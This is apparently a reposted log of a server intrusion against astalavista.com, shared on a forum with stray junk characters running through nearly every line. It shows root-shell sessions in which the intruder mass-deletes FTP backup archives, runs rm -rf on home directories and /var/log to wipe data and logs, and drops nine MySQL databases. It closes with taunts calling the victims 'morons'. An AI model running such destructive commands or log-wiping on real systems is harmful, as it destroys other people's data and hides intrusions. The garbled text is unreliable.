: Q" N( w! Y! g. Z" s8 @- f226 Transfer complete.4 ?+ d2 I- D2 t, Q# z% ?8 P( b
ftp> cd astalavista.com
, ?) N/ r. [5 P7 A& t+ m1 ~250 CWD command successful.
% L% U* \) {/ K" Q) @# xftp> ls -la
/ l1 O8 X5 J. S B" O227 Entering Passive Mode (212,254,194,163,2,189)
: s, U5 z0 C* O7 Z6 T150 Opening BINARY mode data connection for ‘file list’.
4 R, O# r6 f. [% _6 {' s" T" w t-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
2 g" [4 e. a4 j9 U-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz22 {2 B0 ]' u' d: O+ v& X1 Z7 r: r
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
0 |* T! d3 R) A& w1 A& \" `) B' `7 Y: K-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar$ j. _) Q" _/ g" V# i, @# \. ^
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
- F0 W7 b; h3 ?' p# @[snip]
% Q9 i! |: b& n6 N; t, c: `0 `226 Transfer complete.' A# _ Q# k d
ftp> mdelete *
, `' O3 Y6 v" g8 J1 F3 a! vftp> ls -la
, ~1 J- a9 D1 T9 C( _227 Entering Passive Mode (212,254,194,163,2,193)
3 E$ q0 c' U2 }; a, P/ A150 Opening BINARY mode data connection for ‘file list’.
f0 ^/ b; Q3 U& L- }226 Transfer complete.. t' k0 ], w* ?
ftp>3 {2 }# A7 J- L8 ~2 b
2 D* x6 u' y; `sh-3.2# cd /home8 j" o. F& `* a3 W
sh-3.2# ls -la. S" |1 g: w! k% M
total 120& H1 r3 o% }& x h5 [! n9 ?$ B
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
8 x A/ h9 u( T! {8 G1 m( v# {drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
- }, V0 f. I0 ^) B$ [drwx–x–x 9 admin admin 4096 Nov 28 2007 admin& }' S0 u& Q6 f
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
, {# K' v; S; M/ Q% ?6 s$ i; j-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
# |& x0 C) f& r0 c1 @drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet3 u* _5 Z* f. I. H3 j, @. n
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup9 g: [) z7 U) |
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
- f, S6 D0 ^. [0 ~5 pdrwx–x–x 10 com com 4096 Apr 28 12:40 com) e5 z8 d8 ~' f( w$ R
drwxr-xr-x 2 root root 4096 May 17 2007 ftp9 B% ^8 \5 m& S9 L' f
drwx—— 3 jon jon 4096 Sep 21 2007 jon9 Q( U) w; r( c" Q2 M
drwx—— 2 root root 16384 Sep 11 2007 lost+found
9 y' `3 J: o) C2 V) t" Wdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
9 i& n. w8 U! p+ l' pdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
; H; I: w4 m2 A8 e- qdrwx—— 2 jon jon 4096 Sep 15 2007 test
" O! ^% H- O5 E- ]drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp; u% U* M7 @ h# A- {! l1 N
% z% k1 I0 y% l! z4 I* h7 hsh-3.2# rm -rf backup/6 n' m5 C0 e6 u; u8 m
sh-3.2# rm -rf backup.14161/) O* w* w5 I" G, y+ ~
sh-3.2# rm -rf ftp/
0 R) t: r; o8 P* Jsh-3.2# rm -rf jon/# z8 }- Q! u2 a2 C
sh-3.2# rm -rf my/
- `( Q2 p0 Q9 c8 B, ]; U( dsh-3.2# rm -rf mysqldata/
+ N! J0 J/ f6 L& C+ @/ dsh-3.2# rm -rf test/
$ Q) s, |0 p$ Q, X- Ksh-3.2# rm -rf tmp/
3 m2 ^) U" `7 Msh-3.2# cd ~
3 v2 s, a# ?; I( ~- Jsh-3.2# rm -rf *
- _ p$ k: `2 ash-3.2# rm -rf /var/log/
6 g4 U* o5 _- T9 p7 prm: cannot remove directory `/var/log//proftpd’: Directory not empty
1 t% p& d' j2 M& i0 d: B4 ?sh-3.2# rm -rf /home/*
: @) ^( B, r! ]. P0 Y6 Msh-3.2# mysql
, g7 p3 k5 G% ^* f1 j! rWelcome to the MySQL monitor. Commands end with ; or \g./ s" K Q# [1 l9 Z- B6 u
Your MySQL connection id is 407156
" L- ]) b7 M6 s8 Y( `Server version: 5.0.45-community-log MySQL Community Edition (GPL)9 H! ^: S" W& ^& P; |
* `3 R, d' h- v$ a8 @Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
: ], @ a8 w! d+ I: e. e: {0 C' _/ X/ ^8 m) _ @
mysql> show databases;
* T' ?5 g0 i: a+———————–+
7 y2 \) z2 U* D& l( E' {: E# _7 S| Database |
+ f* Y' M+ w w: s' q. S. e+———————–+
/ Z* a1 w8 w7 x% o, w7 [| information_schema |) U4 m) k) C E9 K1 l
| astanet_ads |/ }6 U$ s4 G% ~) D i* x
| astanet_mailing_lists |
0 T' ^) M/ ]; b; O- L1 ?8 \| astanet_mediawiki |9 R- T$ ~$ r+ H! V
| astanet_membersystem |" p. a- D8 w8 o7 g+ O
| com_contrexx |
6 g: Z/ \! H2 Z3 i# k8 J| com_contrexx2 |2 B' ~. ?/ m9 _. k
| com_contrexx2_live |
+ u7 n. N6 n4 a& M2 l| da_roundcube |$ W2 u0 C, ^- k7 f3 ]7 J
| dolphin |
2 |! d' o6 }/ M: _# N$ q2 X| ideapool |) b' [# R) t5 `9 ^
| mysql |! C) }% G2 @5 P) G. p: w& c7 B) d0 M8 V
| test |
% W' M2 t1 i" U) E) k| yourmaster |
, ]- s5 ]) X! B; M( N1 ?) S* z5 R+———————–+6 M3 t$ |0 g3 i. B; Z- \
14 rows in set (0.03 sec)
0 i. n/ l+ L8 R* @+ V8 Q3 w5 h. ?+ j4 C
mysql> drop database astanet_membersystem;
' W) h" @- t. h& w) [droQuery OK, 46 rows affected (0.81 sec)) S2 @: n2 D6 `, ?$ J3 `
0 a& Y$ g/ v( W
mysql> drop database com_contrexx;
! @# \5 N% _1 z/ HQuery OK, 211 rows affected (2.72 sec)
^6 `4 u! k& D3 c3 R
" L+ R) v4 h& t" _( c+ c- Y+ l) xmysql> drop database com_contrexx2;
# L2 _- }1 ?* n0 L4 o+ d+ ]8 DQuery OK, 237 rows affected (2.23 sec)
% C9 A' S, B% N) @/ S% G% t( I3 [% h/ T) u2 w
mysql> drop database com_contrexx2_live;
5 C, c2 M8 Z% \" [Query OK, 227 rows affected (7.63 sec)
" A" l. T; t0 y! Y6 x3 T5 U, [- ?& U& W6 q
mysql> drop database ideapool;
6 S3 Q0 H% C: _* I7 X& TQuery OK, 69 rows affected (0.19 sec)
% S1 E1 F* Z" r) [6 [" m7 v- c# _, z4 Y! d( h: J* C) S2 w. R* G
mysql> drop database yourmaster;
. J" d* I5 E3 ?" X% R" QQuery OK, 158 rows affected (0.55 sec)9 }: B' X. F- e8 t7 E( w. y, g) A+ N
, C# V* @5 Z. B
mysql> drop database astanet_ads;
" i* \* g+ u/ QQuery OK, 9 rows affected (0.11 sec)
6 Y1 m7 o" q: O
7 B! c! e4 o. rmysql> drop database astanet_mailing_lists;
( X7 B4 N% W: G! Q: w3 cQuery OK, 24 rows affected (1.47 sec)
4 K) w p- {& n4 f$ x
2 Z# H5 f$ E+ R9 C2 Tmysql> drop database astanet_mediawiki;1 Q% ^$ y* A! U1 h- c8 d4 `
Query OK, 31 rows affected (0.51 sec)' [0 D' ]' o! w
' p. K+ B i* j. M, f. y8 f8 G' Y
mysql> show databases;
* {9 P0 H+ l9 z; ?! ^0 ?+——————–+
8 h% }7 q$ R2 ^5 S9 t. \1 i) Z! w# E| Database |
( }3 k, P5 q: y7 z* r4 A+——————–+' J! H/ j) R% I E
| information_schema |/ b) a" U |+ S: r, ]- Q% C
| da_roundcube |% b. ]) ]$ z) f3 J( I
| dolphin |
! q1 L5 A0 T1 y3 J0 u- |' j| mysql |4 \! U" E& K" c; e0 M6 |5 B
| test |
; U# _% Z. g2 s Z9 N a9 E+——————–+
0 j9 z/ \+ h, C7 ?9 E0 r5 rows in set (0.00 sec)+ h- x# Q. S( ~
6 m* N' w- V W4 ^- `% s* ?+ B4 U5 f
What a journey! We’re not sure exactly why the “Terminator” had any influence on
& ?, |) A( M& W% b! i t: D {( Rtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the0 m) V4 ]6 \# M$ Y! j
wrong to say this pack of morons *wont be back*. O% }8 E, \1 Y9 H- o* E
|
发表于 2012-11-6 21:07:34
收藏
支持
反对